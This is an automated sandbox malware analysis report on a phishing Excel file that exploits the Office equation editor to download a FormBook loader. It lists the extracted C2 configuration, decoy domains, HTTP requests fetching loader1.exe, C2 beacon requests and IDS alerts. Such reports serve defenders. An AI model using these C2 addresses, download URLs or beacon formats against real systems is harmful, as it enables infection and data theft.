Windows Analysis Report Swift-Payment_Details.xlsx

AV Detection:

Found malware configuration

Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Multi AV Scanner detection for submitted file

Source: Swift-Payment_Details.xlsx

ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY

Antivirus or Machine Learning detection for unpacked file

Source: 9.2.wscript.exe.2ac7960.7.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.wscript.exe.642310.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.vbc.exe.230000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.1.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.vbc.exe.270000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: vbc.exe, wscript.exe
Source:	Binary string: wscript.pdb source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp
Source:	Binary string: wscript.pdbN source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop esi		7_2_00415852
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx		7_2_00406A98
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi		7_2_00415699
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop edi		9_2_00085699
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop esi		9_2_00085852
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop ebx		9_2_00076A99

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.anthonysavillemiddleschool.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 71MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 192.210.173.40:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 173.255.194.134:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 173.255.194.134:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 173.255.194.134:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.extinctionbrews.com/dy8g/

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 15:23:19 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 22 Jul 2021 14:21:45 GMTETag: "2e1d9-5c7b701c11d26"Accept-Ranges: bytesContent-Length: 188889Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c 05 02 7b 28 64 6c 28 28 64 6c 28 28 64 6c 28 c0 7b 67 28 29 64 6c 28 ab 78 62 28 20 64 6c 28 c0 7b 66 28 3f 64 6c 28 21 1c ff 28 23 64 6c 28 28 64 6d 28 16 64 6c 28 21 1c ef 28 29 64 6c 28 21 1c fd 28 29 64 6c 28 52 69 63 68 28 64 6c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f0 7e f9 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 00 00 00 12 00 00 00 00 00 00 5a 20 00 00 00 10 00 00 00 50 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 54 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 34 00 00 00 10 00 00 00 36 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 09 00 00 00 50 00 00 00 0a 00 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 06 00 00 00 60 00 00 00 04 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=rwgJraFzZp/V2q8u2Shj6R3C57WQypzH7HaIjADLKjfnthexEKyoQAtUw623G0BOv3Gwbg== HTTP/1.1Host: www.anthonysavillemiddleschool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL HTTP/1.1Host: www.envisionfordheights.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=qBaU/+yaefHhIJkiEPofXU4iidVfFInHYvzb5F8Pi5TSlEQo4YuA2EgGVMsttPV3rTFjAQ== HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?f6AxB=DyFQJ288GFHSDaRVmYvFextRb5KpVMjfJi9S0KMeos3/VwrcWYQUkgom+EPLcL1jkg9ePA==&m4=JhkpqhXpG6AL HTTP/1.1Host: www.scuolatua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=DD+fNAxrYhECY6o7Z2Ot8DQee/pwekPiIII0s/Xm/SYWktVPhnSE8TJmgfkAm9V0KaSOdQ== HTTP/1.1Host: www.theshapecreator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 192.210.173.40 192.210.173.40

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2ACE7B2.emf

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=rwgJraFzZp/V2q8u2Shj6R3C57WQypzH7HaIjADLKjfnthexEKyoQAtUw623G0BOv3Gwbg== HTTP/1.1Host: www.anthonysavillemiddleschool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL HTTP/1.1Host: www.envisionfordheights.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=qBaU/+yaefHhIJkiEPofXU4iidVfFInHYvzb5F8Pi5TSlEQo4YuA2EgGVMsttPV3rTFjAQ== HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?f6AxB=DyFQJ288GFHSDaRVmYvFextRb5KpVMjfJi9S0KMeos3/VwrcWYQUkgom+EPLcL1jkg9ePA==&m4=JhkpqhXpG6AL HTTP/1.1Host: www.scuolatua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=DD+fNAxrYhECY6o7Z2Ot8DQee/pwekPiIII0s/Xm/SYWktVPhnSE8TJmgfkAm9V0KaSOdQ== HTTP/1.1Host: www.theshapecreator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Found strings which match to known social media urls

Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.anthonysavillemiddleschool.com

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 15:24:48 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>

URLs found in memory or binary data

Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
